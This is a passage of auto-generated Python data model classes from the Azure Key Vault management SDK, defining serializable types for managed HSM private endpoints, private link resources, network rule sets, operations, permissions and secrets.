    :vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
    :ivar private_link_service_connection_state: Approval state of the private link connection.
    :vartype private_link_service_connection_state:
     ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
    :ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
     are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
    :vartype provisioning_state: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
    """

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "etag": {"key": "etag", "type": "str"},
        "private_endpoint": {"key": "properties.privateEndpoint", "type": "MHSMPrivateEndpoint"},
        "private_link_service_connection_state": {
            "key": "properties.privateLinkServiceConnectionState",
            "type": "MHSMPrivateLinkServiceConnectionState",
        },
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,  # pylint: disable=redefined-builtin
        etag: Optional[str] = None,
        private_endpoint: Optional["_models.MHSMPrivateEndpoint"] = None,
        private_link_service_connection_state: Optional["_models.MHSMPrivateLinkServiceConnectionState"] = None,
        provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword id: Id of the private endpoint connection.
        :paramtype id: str
        :keyword etag: Changes whenever the state of the private endpoint connection changes.
        :paramtype etag: str
        :keyword private_endpoint: Properties of the private endpoint object.
        :paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpoint
        :keyword private_link_service_connection_state: Approval state of the private link
         connection.
        :paramtype private_link_service_connection_state:
         ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkServiceConnectionState
        :keyword provisioning_state: Provisioning state of the private endpoint connection. Known
         values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
        :paramtype provisioning_state: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
        """
        super().__init__(**kwargs)
        self.id = id
        self.etag = etag
        self.private_endpoint = private_endpoint
        self.private_link_service_connection_state = private_link_service_connection_state
        self.provisioning_state = provisioning_state
class MHSMPrivateEndpointConnectionsListResult(_serialization.Model):
    """Paged collection of private endpoint connections associated with a managed HSM Pools.

    :ivar value: The private endpoint connection associated with a managed HSM Pools.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
    :ivar next_link: The URL to get the next set of managed HSM Pools.
    :vartype next_link: str
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[MHSMPrivateEndpointConnection]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.MHSMPrivateEndpointConnection"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The private endpoint connection associated with a managed HSM Pools.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
        :keyword next_link: The URL to get the next set of managed HSM Pools.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class MHSMPrivateLinkResource(ManagedHsmResource):
    """A private link resource of a managed HSM.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: The Azure Resource Manager resource ID for the managed HSM Pool.
    :vartype id: str
    :ivar name: The name of the managed HSM Pool.
    :vartype name: str
    :ivar type: The resource type of the managed HSM Pool.
    :vartype type: str
    :ivar location: The supported Azure location where the managed HSM Pool should be created.
    :vartype location: str
    :ivar sku: SKU details.
    :vartype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
    :ivar tags: Resource tags.
    :vartype tags: dict[str, str]
    :ivar system_data: Metadata pertaining to creation and last modification of the key vault
     resource.
    :vartype system_data: ~azure.mgmt.keyvault.v2021_10_01.models.SystemData
    :ivar group_id: Group identifier of private link resource.
    :vartype group_id: str
    :ivar required_members: Required member names of private link resource.
    :vartype required_members: list[str]
    :ivar required_zone_names: Required DNS zone names of the private link resource.
    :vartype required_zone_names: list[str]
    """

    # Server-populated fields; the serializer skips these on outgoing requests.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "system_data": {"readonly": True},
        "group_id": {"readonly": True},
        "required_members": {"readonly": True},
    }

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "sku": {"key": "sku", "type": "ManagedHsmSku"},
        "tags": {"key": "tags", "type": "{str}"},
        "system_data": {"key": "systemData", "type": "SystemData"},
        "group_id": {"key": "properties.groupId", "type": "str"},
        "required_members": {"key": "properties.requiredMembers", "type": "[str]"},
        "required_zone_names": {"key": "properties.requiredZoneNames", "type": "[str]"},
    }

    def __init__(
        self,
        *,
        location: Optional[str] = None,
        sku: Optional["_models.ManagedHsmSku"] = None,
        tags: Optional[Dict[str, str]] = None,
        required_zone_names: Optional[List[str]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword location: The supported Azure location where the managed HSM Pool should be created.
        :paramtype location: str
        :keyword sku: SKU details.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.ManagedHsmSku
        :keyword tags: Resource tags.
        :paramtype tags: dict[str, str]
        :keyword required_zone_names: Required DNS zone names of the private link resource.
        :paramtype required_zone_names: list[str]
        """
        super().__init__(location=location, sku=sku, tags=tags, **kwargs)
        self.required_zone_names = required_zone_names
        # Read-only properties: filled in by the server, never sent by the client.
        self.required_members = None
        self.group_id = None
class MHSMPrivateLinkResourceListResult(_serialization.Model):
    """Collection of managed HSM private link resources.

    :ivar value: Array of private link resources.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkResource]
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[MHSMPrivateLinkResource]"},
    }

    def __init__(
        self, *, value: Optional[List["_models.MHSMPrivateLinkResource"]] = None, **kwargs: Any
    ) -> None:
        """
        :keyword value: Array of private link resources.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateLinkResource]
        """
        super().__init__(**kwargs)
        self.value = value
class MHSMPrivateLinkServiceConnectionState(_serialization.Model):
    """Approval state of a managed HSM private link connection.

    :ivar status: Indicates whether the connection has been approved, rejected or removed by the
     key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
    :vartype status: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
    :ivar description: The reason for approval or rejection.
    :vartype description: str
    :ivar actions_required: A message indicating if changes on the service provider require any
     updates on the consumer. "None"
    :vartype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "status": {"key": "status", "type": "str"},
        "description": {"key": "description", "type": "str"},
        "actions_required": {"key": "actionsRequired", "type": "str"},
    }

    def __init__(
        self,
        *,
        status: Optional[Union[str, "_models.PrivateEndpointServiceConnectionStatus"]] = None,
        description: Optional[str] = None,
        actions_required: Optional[Union[str, "_models.ActionsRequired"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword status: Indicates whether the connection has been approved, rejected or removed by the
         key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
        :paramtype status: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
        :keyword description: The reason for approval or rejection.
        :paramtype description: str
        :keyword actions_required: A message indicating if changes on the service provider require any
         updates on the consumer. "None"
        :paramtype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
        """
        super().__init__(**kwargs)
        self.actions_required = actions_required
        self.description = description
        self.status = status
class MHSMVirtualNetworkRule(_serialization.Model):
    """A rule governing the accessibility of a managed hsm pool from a specific virtual network.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Full resource id of a vnet subnet, such as
     '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
     Required.
    :vartype id: str
    """

    # 'id' is mandatory on outgoing requests.
    _validation = {
        "id": {"required": True},
    }

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
    }

    def __init__(
        self, *, id: str, **kwargs: Any  # pylint: disable=redefined-builtin
    ) -> None:
        """
        :keyword id: Full resource id of a vnet subnet, such as
         '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
         Required.
        :paramtype id: str
        """
        super().__init__(**kwargs)
        self.id = id
class NetworkRuleSet(_serialization.Model):
    """The set of rules governing the network accessibility of a vault.

    :ivar bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
     'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
     "None".
    :vartype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
    :ivar default_action: The default action when no rule from ipRules and from virtualNetworkRules
     match. This is only used after the bypass property has been evaluated. Known values are:
     "Allow" and "Deny".
    :vartype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
    :ivar ip_rules: The list of IP address rules.
    :vartype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.IPRule]
    :ivar virtual_network_rules: The list of virtual network rules.
    :vartype virtual_network_rules:
     list[~azure.mgmt.keyvault.v2021_10_01.models.VirtualNetworkRule]
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "bypass": {"key": "bypass", "type": "str"},
        "default_action": {"key": "defaultAction", "type": "str"},
        "ip_rules": {"key": "ipRules", "type": "[IPRule]"},
        "virtual_network_rules": {"key": "virtualNetworkRules", "type": "[VirtualNetworkRule]"},
    }

    def __init__(
        self,
        *,
        bypass: Optional[Union[str, "_models.NetworkRuleBypassOptions"]] = None,
        default_action: Optional[Union[str, "_models.NetworkRuleAction"]] = None,
        ip_rules: Optional[List["_models.IPRule"]] = None,
        virtual_network_rules: Optional[List["_models.VirtualNetworkRule"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword bypass: Tells what traffic can bypass network rules. This can be 'AzureServices' or
         'None'. If not specified the default is 'AzureServices'. Known values are: "AzureServices" and
         "None".
        :paramtype bypass: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleBypassOptions
        :keyword default_action: The default action when no rule from ipRules and from
         virtualNetworkRules match. This is only used after the bypass property has been evaluated.
         Known values are: "Allow" and "Deny".
        :paramtype default_action: str or ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleAction
        :keyword ip_rules: The list of IP address rules.
        :paramtype ip_rules: list[~azure.mgmt.keyvault.v2021_10_01.models.IPRule]
        :keyword virtual_network_rules: The list of virtual network rules.
        :paramtype virtual_network_rules:
         list[~azure.mgmt.keyvault.v2021_10_01.models.VirtualNetworkRule]
        """
        super().__init__(**kwargs)
        self.virtual_network_rules = virtual_network_rules
        self.ip_rules = ip_rules
        self.default_action = default_action
        self.bypass = bypass
class Operation(_serialization.Model):
    """Definition of a Key Vault REST API operation.

    :ivar name: Operation name: {provider}/{resource}/{operation}.
    :vartype name: str
    :ivar display: Display metadata associated with the operation.
    :vartype display: ~azure.mgmt.keyvault.v2021_10_01.models.OperationDisplay
    :ivar origin: The origin of operations.
    :vartype origin: str
    :ivar is_data_action: Property to specify whether the action is a data action.
    :vartype is_data_action: bool
    :ivar service_specification: One property of operation, include metric specifications.
    :vartype service_specification: ~azure.mgmt.keyvault.v2021_10_01.models.ServiceSpecification
    """

    # Wire-format mapping consumed by the serializer; service_specification is nested
    # under the "properties" envelope on the wire.
    _attribute_map = {
        "name": {"key": "name", "type": "str"},
        "display": {"key": "display", "type": "OperationDisplay"},
        "origin": {"key": "origin", "type": "str"},
        "is_data_action": {"key": "isDataAction", "type": "bool"},
        "service_specification": {"key": "properties.serviceSpecification", "type": "ServiceSpecification"},
    }

    def __init__(
        self,
        *,
        name: Optional[str] = None,
        display: Optional["_models.OperationDisplay"] = None,
        origin: Optional[str] = None,
        is_data_action: Optional[bool] = None,
        service_specification: Optional["_models.ServiceSpecification"] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword name: Operation name: {provider}/{resource}/{operation}.
        :paramtype name: str
        :keyword display: Display metadata associated with the operation.
        :paramtype display: ~azure.mgmt.keyvault.v2021_10_01.models.OperationDisplay
        :keyword origin: The origin of operations.
        :paramtype origin: str
        :keyword is_data_action: Property to specify whether the action is a data action.
        :paramtype is_data_action: bool
        :keyword service_specification: One property of operation, include metric specifications.
        :paramtype service_specification: ~azure.mgmt.keyvault.v2021_10_01.models.ServiceSpecification
        """
        super().__init__(**kwargs)
        self.service_specification = service_specification
        self.is_data_action = is_data_action
        self.origin = origin
        self.display = display
        self.name = name
class OperationDisplay(_serialization.Model):
    """Human-readable display metadata associated with an operation.

    :ivar provider: Service provider: Microsoft Key Vault.
    :vartype provider: str
    :ivar resource: Resource on which the operation is performed etc.
    :vartype resource: str
    :ivar operation: Type of operation: get, read, delete, etc.
    :vartype operation: str
    :ivar description: Description of operation.
    :vartype description: str
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "provider": {"key": "provider", "type": "str"},
        "resource": {"key": "resource", "type": "str"},
        "operation": {"key": "operation", "type": "str"},
        "description": {"key": "description", "type": "str"},
    }

    def __init__(
        self,
        *,
        provider: Optional[str] = None,
        resource: Optional[str] = None,
        operation: Optional[str] = None,
        description: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword provider: Service provider: Microsoft Key Vault.
        :paramtype provider: str
        :keyword resource: Resource on which the operation is performed etc.
        :paramtype resource: str
        :keyword operation: Type of operation: get, read, delete, etc.
        :paramtype operation: str
        :keyword description: Description of operation.
        :paramtype description: str
        """
        super().__init__(**kwargs)
        self.description = description
        self.operation = operation
        self.resource = resource
        self.provider = provider
class OperationListResult(_serialization.Model):
    """Result of the request to list Storage operations: a page of operations plus a
    continuation URL for the next page.

    :ivar value: List of Storage operations supported by the Storage resource provider.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Operation]
    :ivar next_link: The URL to get the next set of operations.
    :vartype next_link: str
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[Operation]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.Operation"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: List of Storage operations supported by the Storage resource provider.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Operation]
        :keyword next_link: The URL to get the next set of operations.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class Permissions(_serialization.Model):
    """The permissions an identity holds over keys, secrets, certificates and storage.

    :ivar keys: Permissions to keys.
    :vartype keys: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.KeyPermissions]
    :ivar secrets: Permissions to secrets.
    :vartype secrets: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.SecretPermissions]
    :ivar certificates: Permissions to certificates.
    :vartype certificates: list[str or
     ~azure.mgmt.keyvault.v2021_10_01.models.CertificatePermissions]
    :ivar storage: Permissions to storage accounts.
    :vartype storage: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.StoragePermissions]
    """

    # All four permission lists serialize as plain string arrays on the wire.
    _attribute_map = {
        "keys": {"key": "keys", "type": "[str]"},
        "secrets": {"key": "secrets", "type": "[str]"},
        "certificates": {"key": "certificates", "type": "[str]"},
        "storage": {"key": "storage", "type": "[str]"},
    }

    def __init__(
        self,
        *,
        keys: Optional[List[Union[str, "_models.KeyPermissions"]]] = None,
        secrets: Optional[List[Union[str, "_models.SecretPermissions"]]] = None,
        certificates: Optional[List[Union[str, "_models.CertificatePermissions"]]] = None,
        storage: Optional[List[Union[str, "_models.StoragePermissions"]]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword keys: Permissions to keys.
        :paramtype keys: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.KeyPermissions]
        :keyword secrets: Permissions to secrets.
        :paramtype secrets: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.SecretPermissions]
        :keyword certificates: Permissions to certificates.
        :paramtype certificates: list[str or
         ~azure.mgmt.keyvault.v2021_10_01.models.CertificatePermissions]
        :keyword storage: Permissions to storage accounts.
        :paramtype storage: list[str or ~azure.mgmt.keyvault.v2021_10_01.models.StoragePermissions]
        """
        super().__init__(**kwargs)
        self.storage = storage
        self.certificates = certificates
        self.secrets = secrets
        self.keys = keys
class PrivateEndpoint(_serialization.Model):
    """Properties of a private endpoint object.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Full identifier of the private endpoint resource.
    :vartype id: str
    """

    # 'id' is server-populated and never sent by the client.
    _validation = {
        "id": {"readonly": True},
    }

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
    }

    def __init__(self, **kwargs: Any) -> None:
        """ """
        super().__init__(**kwargs)
        self.id = None
class PrivateEndpointConnection(Resource):
    """A private endpoint connection resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified identifier of the key vault resource.
    :vartype id: str
    :ivar name: Name of the key vault resource.
    :vartype name: str
    :ivar type: Resource type of the key vault resource.
    :vartype type: str
    :ivar location: Azure location of the key vault resource.
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource.
    :vartype tags: dict[str, str]
    :ivar etag: Modified whenever there is a change in the state of private endpoint connection.
    :vartype etag: str
    :ivar private_endpoint: Properties of the private endpoint object.
    :vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
    :ivar private_link_service_connection_state: Approval state of the private link connection.
    :vartype private_link_service_connection_state:
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
    :ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
     are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
    :vartype provisioning_state: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
    """

    # Server-populated fields inherited from Resource; skipped on outgoing requests.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "tags": {"readonly": True},
    }

    # Wire-format mapping consumed by the serializer; connection details live
    # under the "properties" envelope on the wire.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "etag": {"key": "etag", "type": "str"},
        "private_endpoint": {"key": "properties.privateEndpoint", "type": "PrivateEndpoint"},
        "private_link_service_connection_state": {
            "key": "properties.privateLinkServiceConnectionState",
            "type": "PrivateLinkServiceConnectionState",
        },
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(
        self,
        *,
        etag: Optional[str] = None,
        private_endpoint: Optional["_models.PrivateEndpoint"] = None,
        private_link_service_connection_state: Optional["_models.PrivateLinkServiceConnectionState"] = None,
        provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword etag: Modified whenever there is a change in the state of private endpoint connection.
        :paramtype etag: str
        :keyword private_endpoint: Properties of the private endpoint object.
        :paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
        :keyword private_link_service_connection_state: Approval state of the private link connection.
        :paramtype private_link_service_connection_state:
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
        :keyword provisioning_state: Provisioning state of the private endpoint connection. Known
         values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
        :paramtype provisioning_state: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
        """
        super().__init__(**kwargs)
        self.provisioning_state = provisioning_state
        self.private_link_service_connection_state = private_link_service_connection_state
        self.private_endpoint = private_endpoint
        self.etag = etag
class PrivateEndpointConnectionItem(_serialization.Model):
    """A single private endpoint connection item.

    :ivar id: Id of private endpoint connection.
    :vartype id: str
    :ivar etag: Modified whenever there is a change in the state of private endpoint connection.
    :vartype etag: str
    :ivar private_endpoint: Properties of the private endpoint object.
    :vartype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
    :ivar private_link_service_connection_state: Approval state of the private link connection.
    :vartype private_link_service_connection_state:
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
    :ivar provisioning_state: Provisioning state of the private endpoint connection. Known values
     are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
    :vartype provisioning_state: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
    """

    # Wire-format mapping consumed by the serializer; connection details live
    # under the "properties" envelope on the wire.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "etag": {"key": "etag", "type": "str"},
        "private_endpoint": {"key": "properties.privateEndpoint", "type": "PrivateEndpoint"},
        "private_link_service_connection_state": {
            "key": "properties.privateLinkServiceConnectionState",
            "type": "PrivateLinkServiceConnectionState",
        },
        "provisioning_state": {"key": "properties.provisioningState", "type": "str"},
    }

    def __init__(
        self,
        *,
        id: Optional[str] = None,  # pylint: disable=redefined-builtin
        etag: Optional[str] = None,
        private_endpoint: Optional["_models.PrivateEndpoint"] = None,
        private_link_service_connection_state: Optional["_models.PrivateLinkServiceConnectionState"] = None,
        provisioning_state: Optional[Union[str, "_models.PrivateEndpointConnectionProvisioningState"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword id: Id of private endpoint connection.
        :paramtype id: str
        :keyword etag: Modified whenever there is a change in the state of private endpoint connection.
        :paramtype etag: str
        :keyword private_endpoint: Properties of the private endpoint object.
        :paramtype private_endpoint: ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpoint
        :keyword private_link_service_connection_state: Approval state of the private link connection.
        :paramtype private_link_service_connection_state:
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkServiceConnectionState
        :keyword provisioning_state: Provisioning state of the private endpoint connection. Known
         values are: "Succeeded", "Creating", "Updating", "Deleting", "Failed", and "Disconnected".
        :paramtype provisioning_state: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionProvisioningState
        """
        super().__init__(**kwargs)
        self.provisioning_state = provisioning_state
        self.private_link_service_connection_state = private_link_service_connection_state
        self.private_endpoint = private_endpoint
        self.etag = etag
        self.id = id
class PrivateEndpointConnectionListResult(_serialization.Model):
    """Paged collection of private endpoint connections.

    :ivar value: The list of private endpoint connections.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnection]
    :ivar next_link: The URL to get the next set of private endpoint connections.
    :vartype next_link: str
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[PrivateEndpointConnection]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.PrivateEndpointConnection"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The list of private endpoint connections.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnection]
        :keyword next_link: The URL to get the next set of private endpoint connections.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class PrivateLinkResource(Resource):
    """A private link resource of a key vault.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified identifier of the key vault resource.
    :vartype id: str
    :ivar name: Name of the key vault resource.
    :vartype name: str
    :ivar type: Resource type of the key vault resource.
    :vartype type: str
    :ivar location: Azure location of the key vault resource.
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource.
    :vartype tags: dict[str, str]
    :ivar group_id: Group identifier of private link resource.
    :vartype group_id: str
    :ivar required_members: Required member names of private link resource.
    :vartype required_members: list[str]
    :ivar required_zone_names: Required DNS zone names of the private link resource.
    :vartype required_zone_names: list[str]
    """

    # Server-populated fields; the serializer skips these on outgoing requests.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "tags": {"readonly": True},
        "group_id": {"readonly": True},
        "required_members": {"readonly": True},
    }

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "group_id": {"key": "properties.groupId", "type": "str"},
        "required_members": {"key": "properties.requiredMembers", "type": "[str]"},
        "required_zone_names": {"key": "properties.requiredZoneNames", "type": "[str]"},
    }

    def __init__(
        self, *, required_zone_names: Optional[List[str]] = None, **kwargs: Any
    ) -> None:
        """
        :keyword required_zone_names: Required DNS zone names of the private link resource.
        :paramtype required_zone_names: list[str]
        """
        super().__init__(**kwargs)
        self.required_zone_names = required_zone_names
        # Read-only properties: filled in by the server, never sent by the client.
        self.required_members = None
        self.group_id = None
class PrivateLinkResourceListResult(_serialization.Model):
    """Collection of private link resources.

    :ivar value: Array of private link resources.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkResource]
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[PrivateLinkResource]"},
    }

    def __init__(
        self, *, value: Optional[List["_models.PrivateLinkResource"]] = None, **kwargs: Any
    ) -> None:
        """
        :keyword value: Array of private link resources.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateLinkResource]
        """
        super().__init__(**kwargs)
        self.value = value
class PrivateLinkServiceConnectionState(_serialization.Model):
    """Approval state of a private link connection.

    :ivar status: Indicates whether the connection has been approved, rejected or removed by the
     key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
    :vartype status: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
    :ivar description: The reason for approval or rejection.
    :vartype description: str
    :ivar actions_required: A message indicating if changes on the service provider require any
     updates on the consumer. "None"
    :vartype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "status": {"key": "status", "type": "str"},
        "description": {"key": "description", "type": "str"},
        "actions_required": {"key": "actionsRequired", "type": "str"},
    }

    def __init__(
        self,
        *,
        status: Optional[Union[str, "_models.PrivateEndpointServiceConnectionStatus"]] = None,
        description: Optional[str] = None,
        actions_required: Optional[Union[str, "_models.ActionsRequired"]] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword status: Indicates whether the connection has been approved, rejected or removed by the
         key vault owner. Known values are: "Pending", "Approved", "Rejected", and "Disconnected".
        :paramtype status: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointServiceConnectionStatus
        :keyword description: The reason for approval or rejection.
        :paramtype description: str
        :keyword actions_required: A message indicating if changes on the service provider require any
         updates on the consumer. "None"
        :paramtype actions_required: str or ~azure.mgmt.keyvault.v2021_10_01.models.ActionsRequired
        """
        super().__init__(**kwargs)
        self.actions_required = actions_required
        self.description = description
        self.status = status
class ResourceListResult(_serialization.Model):
    """Paged collection of vault resources.

    :ivar value: The list of vault resources.
    :vartype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Resource]
    :ivar next_link: The URL to get the next set of vault resources.
    :vartype next_link: str
    """

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "value": {"key": "value", "type": "[Resource]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(
        self,
        *,
        value: Optional[List["_models.Resource"]] = None,
        next_link: Optional[str] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword value: The list of vault resources.
        :paramtype value: list[~azure.mgmt.keyvault.v2021_10_01.models.Resource]
        :keyword next_link: The URL to get the next set of vault resources.
        :paramtype next_link: str
        """
        super().__init__(**kwargs)
        self.next_link = next_link
        self.value = value
class Secret(Resource):
    """Secret resource information with extended details.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified identifier of the key vault resource.
    :vartype id: str
    :ivar name: Name of the key vault resource.
    :vartype name: str
    :ivar type: Resource type of the key vault resource.
    :vartype type: str
    :ivar location: Azure location of the key vault resource.
    :vartype location: str
    :ivar tags: Tags assigned to the key vault resource.
    :vartype tags: dict[str, str]
    :ivar properties: Properties of the secret. Required.
    :vartype properties: ~azure.mgmt.keyvault.v2021_10_01.models.SecretProperties
    """

    # Inherited Resource fields are server-populated; 'properties' is the only
    # field callers must supply.
    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "location": {"readonly": True},
        "tags": {"readonly": True},
        "properties": {"required": True},
    }

    # Wire-format mapping consumed by the serializer.
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "location": {"key": "location", "type": "str"},
        "tags": {"key": "tags", "type": "{str}"},
        "properties": {"key": "properties", "type": "SecretProperties"},
    }

    def __init__(
